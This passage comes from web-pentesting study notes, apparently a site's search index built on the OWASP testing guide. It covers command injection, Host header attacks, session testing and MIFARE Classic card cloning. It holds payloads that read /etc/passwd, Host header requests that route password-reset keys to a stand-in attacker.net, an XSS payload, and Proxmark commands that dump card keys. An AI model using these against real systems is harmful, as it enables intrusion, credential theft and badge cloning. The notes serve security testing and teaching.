                            # Directly injecting operating system commands:\nhttp://sensitive/something.php?dir=%3Bcat%20/etc/passwd\n\n########\n# Injecting PHP commands\n#########\n\n# Validating that the injection is possible\nhttp://example.com/page.php?message=test;phpinfo();\nhttp://example.com/page.php?id=1'];phpinfo();\n\n# Executing PHP commands\nhttp://example.com/page.php?message=test;system(cat%20/etc/passwd)\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#special-characters-for-command-injection","title":"Special characters for command injection","text":"

                            The following special character can be used for command injection such as:

                            | ; & $ > < ' ! \n
                            # Uses of | will make command 2 to be executed weather command 1 execution is successful or not.\ncmd1|cmd2\n\n# Uses of ; will make command 2 to be executed weather command 1 execution is successful or not.\ncmd1;cmd2\n\n# Command 2 will only be executed if command 1 execution fails. \ncmd1||cmd2\n\n\n# Command 2 will only be executed if command 1 execution succeeds. \ncmd1&&cmd2\n\n# For example, echo $(whoami) or $(touch test.sh; echo 'ls' > test.sh)\n$(cmd)\n\n# It\u2019s used to execute specific command. For example, whoami \ncmd\n\n>(cmd) : >(ls) \n<(cmd) : <(ls)\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#code-review-dangerous-api","title":"Code Review Dangerous API","text":"

                            Be aware of the uses of following API as it may introduce the command injection risks.

                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#java","title":"Java","text":"
                            Runtime.exec()\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#cc","title":"C/C++","text":"
                            system \nexec \nShellExecute\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#python","title":"Python","text":"
                            exec\neval\nos.system\nos.popen\nsubprocess.popen\nsubprocess.call\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php","title":"PHP","text":"
                            system\nshell_exec \nexec\nproc_open \neval\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-13/","title":"Testing for Format String Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.13. Testing for Format String Injection

                            ID Link to Hackinglife Link to OWASP Description 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application.","tags":["web pentesting","WSTG-INPV-13"]},{"location":"OWASP/WSTG-INPV-14/","title":"Testing for Incubated Vulnerability","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.14. Testing for Incubated Vulnerability

                            ID Link to Hackinglife Link to OWASP Description 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible.","tags":["web pentesting","WSTG-INPV-14"]},{"location":"OWASP/WSTG-INPV-15/","title":"Testing for HTTP Splitting Smuggling","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.15. Testing for HTTP Splitting Smuggling

                            ID Link to Hackinglife Link to OWASP Description 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable.","tags":["web pentesting","WSTG-INPV-15"]},{"location":"OWASP/WSTG-INPV-16/","title":"Testing for HTTP Incoming Requests","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.16. Testing for HTTP Incoming Requests

                            ID Link to Hackinglife Link to OWASP Description 7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. - Monitor HTTP traffic without changes of end user Browser proxy or client-side application.","tags":["web pentesting","WSTG-INPV-16"]},{"location":"OWASP/WSTG-INPV-17/","title":"Testing for Host Header Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.17. Testing for Host Header Injection

                            ID Link to Hackinglife Link to OWASP Description 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header.

                            The goal:

                            • Assess if the Host header is being parsed dynamically in the application.
                            • Bypass security controls that rely on the header.

                            Source: https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#supply-an-arbitrary-host-header","title":"Supply an arbitrary Host header","text":"

                            Some intercepting proxies derive the target IP address from the Host header directly, which makes this kind of testing all but impossible; any changes you made to the header would just cause the request to be sent to a completely different IP address. However, Burp Suite accurately maintains the separation between the Host header and the target IP address.

                            In Burpsuite, set the target to www.example.com. Then, send your request with modified Host header:

                            GET / HTTP/1.1\nHost: www.attacker.com\n

                            The front-end server or load balancer that received your request may simply not know where to forward it, resulting in an \"Invalid Host header\" error of some kind. This is especially likely if your target is accessed via a CDN.

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#inject-host-override-headers","title":"Inject host override headers","text":"","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#x-forwarded-host-header-bypass","title":"X-Forwarded Host Header Bypass","text":"
                            GET / HTTP/1.1\nHost: www.example.com\nX-Forwarded-Host: www.attacker.com\n

                            Potentially producing client-side output such as:

                            <link src=\"http://www.attacker.com/link\" />\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#more-headers-bypassing","title":"More headers bypassing","text":"

                            Although\u00a0X-Forwarded-Host\u00a0is the de facto standard for this behavior, you may come across other headers that serve a similar purpose, including:

                            • X-Host
                            • X-Forwarded-Server
                            • X-HTTP-Host-Override
                            • Forwarded

                            In Burp Suite, you can use thec's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#injecting-multiple-host-headers","title":"Injecting multiple Host headers","text":"
                            GET / HTTP/1.1\nHost:\u00a0www.example.com\nHost: www.attacker.com\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#http_host-vs-server_name-routing","title":"HTTP_HOST vs. SERVER_NAME Routing","text":"

                            By supplying an absolute URL.

                            POST https://example.com/passwordreset HTTP/1.1\nHost: www.evil.com\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#port-based-attack","title":"Port-based attack","text":"

                            Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax:

                            POST /user/passwrordeset HTTP/1.1\nHost: example.com:@attacker.net\n

                            This may result in a suspicious password reset link. By clicking it, the victim's browser will send the key to attacker.net before creating the suspicious URL popup.

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#persistent-xss-via-host-header-injection","title":"Persistent XSS via Host header injection","text":"
                            GET /index.html HTTP/1.1\nHost: cow\\\"onerror='alert(1)'rel='stylesheet'\" http://example.com/ | fgrep cow\\\n

                            The response should show a poisoned <link> element:

                            <link href=\"http://cow\"onerror='alert(1)'rel='stylesheet'/\" rel=\"canonical\"/>\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#add-line-wrapping","title":"Add line wrapping","text":"

                            The website may block requests with multiple Host headers, but you may be able to bypass this validation by indenting one of them like this. Some servers will interpret the indented header as a wrapped line and, therefore, treat it as part of the preceding header's value. Other servers will ignore the indented header altogether.

                            GET /example HTTP/1.1 \n    Host: attacker.com \nHost: example.com\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#exploitation","title":"Exploitation","text":"

                            https://portswigger.net/web-security/host-header/exploiting

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-18/","title":"Testing for Server-side Template Injection","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

                            ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit.

                            Server-side Template Injection in HackingLife

                            Web applications commonly use server-side templating technologies (Jinja2, Twig, FreeMaker, etc.) to generate dynamic HTML responses. Server-side Template Injection vulnerabilities (SSTI) occur when user input is embedded in a template in an unsafe manner and results in remote code execution on the server. Any features that support advanced user-supplied markup may be vulnerable to SSTI.

                            ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-18/#see-my-notes","title":"See my notes","text":"
                            • Server Side Template Injections: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
                            ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-19/","title":"Testing for Server-Side Request Forgery","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery | ID | Link to Hackinglife | Link to OWASP | Description | | :--- | :------------------------------ | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------------------- | | 7.19 | WSTG-INPV-19 | Testing for Server-Side Request Forgery | - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability. |

                            ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-19/#see-my-notes","title":"See my notes","text":"
                            • Server Side Request Forgery SSRF: What is it. Payloads. Techniques. Dictionaries. Tools.
                            ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-20/","title":"Testing for Mass Assignment","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.20. Testing for Mass Assignment

                            ID Link to Hackinglife Link to OWASP Description 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["web pentesting","WSTG-INPV-20"]},{"location":"OWASP/WSTG-SESS-01/","title":"Testing for Session Management Schema","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.1. Testing for Session Management Schema

                            ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated.

                            Session management in web applications refers to the process of securely handling and maintaining user sessions. A session is a period of interaction between a user and a web application, typically beginning when a user logs in and ending when they log out or their session expires due to inactivity. During a session, the application needs to recognize and track the user, store their data, and manage their access to different parts of the application.

                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#components","title":"Components","text":"
                            • Session Identifier: A unique token (often a session ID) is assigned to each user's session. This token is used to associate subsequent requests from the user with their session data.
                            • Session Data: Information related to the user's session, such as authentication status, user preferences, and temporary data, is stored on the server.
                            • Session Cookies: Session cookies are small pieces of data stored on the user's browser that contain the session ID. They are used to maintain state between the client and server.
                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#what-is-session-used-for","title":"What is session used for","text":"
                            • User Authentication: Session management is critical for user authentication. After a user logs in, the session management system keeps track of their authenticated state, allowing them to access protected resources without repeatedly entering credentials.
                            • User State: Web applications often need to maintain state information about a user's activities. For example, in an e-commerce site, the session management system keeps track of the items in a user's shopping cart.
                            • Security: If proper session management is not implemented correctly, it can lead to vulnerabilities such as session fixation, session hijacking, and unauthorized access.
                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#session-management-testing","title":"Session Management Testing","text":"

                            Some typical vulnerabilities related to session management are:

                            • Session Fixation Testing: Test for session fixation vulnerabilities by attempting to set a known session ID (controlled by the tester) and then login with another account. Verify if the application accepts the predefined session ID and allows the attacker access to the target account.
                            • Session Hijacking Testing: Test for session hijacking vulnerabilities by trying to capture and reuse another user's session ID. Tools like Wireshark or Burp Suite can help intercept and analyze network traffic for session data.
                            • Session ID Brute-Force: Attempt to brute force session IDs to assess their complexity and the application's resistance to such attacks.
                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-02/","title":"Testing for Cookies Attributes","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.2. Testing for Cookies Attributes

                            ID Link to Hackinglife Link to OWASP Description 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict)","tags":["web pentesting","WSTG-SESS-02"]},{"location":"OWASP/WSTG-SESS-03/","title":"Testing for Session Fixation","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.3. Testing for Session Fixation

                            ID Link to Hackinglife Link to OWASP Description 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renew the cookie after a successfully user authentication.

                            Session fixation is a web application security attack where an attacker sets or fixes a user's session identifier (session token) to a known value of the attacker's choice. Subsequently, the attacker tricks the victim into using this fixed session identifier to log in, thereby granting the attacker unauthorized access to the victim's session.

                            The attacker obtains a session token issued by the target web application. This can be done in several ways, such as:

                            • Predicting or guessing the session token: Some web applications generate session tokens that are easy to predict or lack sufficient randomness.
                            • Intercepting the session token: If the application doesn't use secure channels (e.g., HTTPS) to transmit session tokens, an attacker may intercept them as they travel over an insecure network, such as an open Wi-Fi hotspot.

                            With a session token in hand, the attacker sets or fixes the victim's session token to a known value that the attacker controls. This value could be one generated by the attacker or an existing valid session token.

                            The attacker lures the victim into using the fixed session token to log in to the web application. This can be accomplished through various means:

                            • Sending the victim a link that includes the fixed session token.
                            • Manipulating the victim into clicking on a specially crafted URL.
                            • Social engineering tactics to convince the victim to log in under specific circumstances.

                            Once the victim logs in with the fixed session token, the attacker can now hijack the victim's session. The web application recognizes the attacker as the legitimate user since the session token matches what is expected.

                            ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-03/#mitigation","title":"Mitigation","text":"
                            • Implementing a session token renewal after a user successfully authenticates.
                            • The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another session ID.
                            • Prevent \"forced cookies\" with full HSTS adoption.
                            ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-04/","title":"Testing for Exposed Session Variables","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.4. Testing for Exposed Session Variables

                            ID Link to Hackinglife Link to OWASP Description 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method ?)","tags":["web pentesting","WSTG-SESS-04"]},{"location":"OWASP/WSTG-SESS-05/","title":"Testing for Cross Site Request Forgery","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

                            ID Link to Hackinglife Link to OWASP Description 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token.

                            Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

                            ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-05/#see-my-notes","title":"See my notes","text":"
                            • CSRF attack - Cross Site Request Forgery
                            ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-06/","title":"Testing for Logout Functionality","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.6. Testing for Logout Functionality

                            ID Link to Hackinglife Link to OWASP Description 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout.","tags":["web pentesting","WSTG-SESS-06"]},{"location":"OWASP/WSTG-SESS-07/","title":"Testing Session Timeout","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.7. Testing Session Timeout

                            ID Link to Hackinglife Link to OWASP Description 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable.","tags":["web pentesting","WSTG-SESS-07"]},{"location":"OWASP/WSTG-SESS-08/","title":"Testing for Session Puzzling","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.8. Testing for Session Puzzling

                            ID Link to Hackinglife Link to OWASP Description 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose","tags":["web pentesting","WSTG-SESS-08"]},{"location":"OWASP/WSTG-SESS-09/","title":"Testing for Session Hijacking","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.9. Testing for Session Hijacking

                            ID Link to Hackinglife Link to OWASP Description 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level.

                            An attacker who gets access to user session cookies can impersonate them by presenting such cookies. This attack is known as session hijacking.

                            ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#testing","title":"Testing","text":"

                            The testing strategy is targeted at network attackers, hence it only needs to be applied to sites without full HSTS adoption (sites with full HSTS adoption are secure, since their cookies are not communicated over HTTP).

                            We assume to have two testing accounts on the website under test, one to act as the victim and one to act as the attacker. We Web Security Testing Guide v4.2 214 simulate a scenario where the attacker steals all the cookies which are not protected against disclosure over HTTP, and presents them to the website to access the victim\u2019s account. If these cookies are enough to act on the victim\u2019s behalf, session hijacking is possible.

                            Steps for executing this test: 1. Login to the website as the victim and reach any page offering a secure function requiring authentication. 2. Delete from the cookie jar all the cookies which satisfy any of the following conditions. in case there is no HSTS adoption: the Secure attribute is set. in case there is partial HSTS adoption: the Secure attribute is set or the Domain attribute is not set. 3. Save a snapshot of the cookie jar. 4. Trigger the secure function identified at step 1. 5. Observe whether the operation at step 4 has been performed successfully. If so, the attack was successful. 6. Clear the cookie jar, login as the attacker and reach the page at step 1. 7. Write in the cookie jar, one by one, the cookies saved at step 3. 8. Trigger again the secure function identified at step 1. 9. Clear the cookie jar and login again as the victim. 10. Observe whether the operation at step 8 has been performed successfully in the victim\u2019s account. If so, the attack was successful; otherwise, the site is secure against session hijacking.

                            ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#mitigation","title":"Mitigation","text":"
                            • Full HSTS adoption.
                            ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-10/","title":"Testing JSON Web Tokens","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.10. Testing JSON Web Tokens

                            ID Link to Hackinglife Link to OWASP Description 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. - Determine whether the JWTs can be tampered with or modified.","tags":["web pentesting","WSTG-SESS-10"]},{"location":"RFID/mifare-classic/","title":"Mifare Classic","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic_1","title":"Mifare classic","text":"

                            The MiFare CanaNFC-based NFC based chip following the\u00a0ISO 14443A\u00a049\u00a0standard. The memory of this chip (assuming we are talking about the Classic 1K) is divided into 16 sectors of 64 bytes each. Like most, if not all, NFC cards it also contains UID and other data. Each sector can contain 2 keys as well as access condition information. All of these sectors can be encrypted with the Crypto1 algorithm to protect the data from being copied. Each key in each sector can be used to open a door (or anything else) in a sequence that goes something like this:

                            1. Reader detects NFC card and sends out information to unlock at least 1 sector on the MiFare Classic chip
                            2. Assuming the MiFare classic is programmed for this door, it sends back the key and access conditions
                            3. The reader validates the key and access conditions it receives and checks if the UID of the key is valid or within a specified range
                            4. If everything is in order, the reader opens the door
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-cards","title":"Mifare Classic Cards","text":"
                            • Mifare Classic 1K
                            • Mifare Classic 4K
                            • Mifare Classic EV1

                            In a Mifare classic card there are sectors, and each sector contains a number of blocks. Each sector has a sector trailer, which is a block through which you can access data. That means that access conditions are stored in the sector trailer (the key A, the key B and the access bits.)

                            Each Mifare Tag has a 4Bytes UID which is unique and not changeable. Some Mifare cards have a 7 Byte UID.

                            Transport configuration: At chip delivery, all keys are set to 0xFF FF FF FF FF FF (6 times FFh) and the bytes 6, 7 and 8 are set to 0xFF0780 (See Transport Configuration.) Additionally byte-9 is used for general purpose 1 byte user data. Factory default value is 0x69. Therefore, at chip delivery sector trailer would be:

                            0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF

                            Or:

                            Key A Access bits Key B FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF

                            Transport configuration is the name for factory default keys and configuration: - KeyA: 0x FF FF FF FF FF FF (Default Key - Cannot be readable) - KeyB: 0x FF FF FF FF FF FF (Default Data) KeyB is used as data in transport configuration because it is readable. It cannot be used as authentication key. - Access Bits: 0xFF0780 Access Bits: 0xFF0780 meaning: - KeyA never be read, but can write(change) itself. - KeyA can read/write Access Bits and KeyB. - Notice that the KeyB is read-able by KeyA. Thus, KeyB cannot be used as an authentication key. It can be used for general purpose user data. - KeyA is allowed to read/write/increment/decrement for the data blocks

                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classics-1k","title":"Mifare Classics 1K","text":"

                            Memory Organization:

                            • 1024 Bytes
                            • Sectors and Blocks:
                            • 16 Sectors (0-15).
                            • 4 block in each Sector
                            • 16 Bytes in each Block
                            • 2 Keys (A/B) in each Sector
                            • Sector Trailer
                            • Authentication is required

                            Access bits and conditions: Attention: With each memory access the internal logic verifies the format of the access conditions. If it detects a format violation the whole sector is irreversibly blocked.

                            On chip delivery the access conditions for the sector trailers and KeyA are predefined as Transport Configuration. Since KeyB may be read in the transport configuration, it cannot be used as authentication key and new cards must be authenticated with KeyA. Since the access bits themselves can also be blocked, special care has to be taken during the personalization of cards.

                            Access conditions of sector trailer:

                            Access Conditions of Data Block

                            Following example analysis the Transport Configuration Access Bits (0xFF0780):

                            • Byte6 = 0xFF
                            • Byte7 = 0x07
                            • Byte8 = 0x80
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-4k","title":"Mifare Classic 4K","text":"

                            Structure Memory Structure:

                            • 4096 Bytes
                            • 40 Sectors (0-39)
                            • 32 Sectors (0 \u2013 31 ) are of 4 Blocks
                            • 8 Sectors are of 16 Blocks
                            • Each Sector has Sector Trailer Block
                            • Authentication is required
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#cloning-a-mifare-classic","title":"Cloning a MIFARE classic","text":"

                            Proxmark Cheat sheet

                            Make sure that it's a MIFARE classic 1K card:

                            hf search\n

                            Lats line should return:

                            Valid ISO14443A Tag Found - Quitting Search\n

                            In this case it\u2019s a Mifare 1k card. Copy the UID of the card, which we\u2019ll need later. From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used):

                            hf mf chk --1k -f mfc_default_keys\n

                            Results:

                            Found valid key:[ffffffffffff]  \n

                            This shows a key of ffffffffffff, which we can plug into the next command, which dumps keys to file:

                            hf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n

                            This dumps keys from the card into the file dumpkeys.bin. The output should be something like this:

                            [+] Testing known keys. Sector count 16\n[+] Fast check found all keys\n\n[+] found keys:\n\n[+] -----+-----+--------------+---+--------------+----\n[+]  Sec | Blk | key A        |res| key B        |res\n[+] -----+-----+--------------+---+--------------+----\n[+]  000 | 003 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] -----+-----+--------------+---+--------------+----\n[+] ( 0:Failed / 1:Success )\n\n[+] Generating binary key file\n[+] Found keys have been dumped to `/home/ME/hf-mf-<UID>-key.bin`\n[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0\n

                            Another way is to do an autopwn:

                            hf mf autopwn\n

                            Now to dump the contents of the card:

                            hf mf dump --1k\n

                            This dumps data from the card into dumpdata.bin. The output should be something like this:

                            Using... hf-mf-<UID>-key.bin\n[+] Loaded binary key file `/home/ME/hf-mf-<UID>-key.bin`\n[=] Reading sector access bits...\n[=] .................\n[+] Finished reading sector access bits\n[=] Dumping all blocks from card...\n \ud83d\udd53 Sector...  9 block... 3 ( ok )[#] Can't select card\n[#] Can't select card\n \ud83d\udd51 Sector... 15 block... 1 ( ok )[#] Can't select card\n \ud83d\udd53 Sector... 15 block... 3 ( ok )\n[+] Succeeded in dumping all blocks\n\n[+] time: 9 seconds\n\n\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]  sec | blk | data                                            | ascii\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]    0 |   0 | FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF | .B........]..6..\n[=]      |   1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   3 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    1 |   4 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   5 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   7 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    2 |   8 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   9 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  11 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    3 |  12 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  13 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  15 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    4 |  16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  19 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    5 |  20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  23 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    6 |  24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  27 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    7 |  28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  30 | 00 00 00 00 00 00 00 00 00 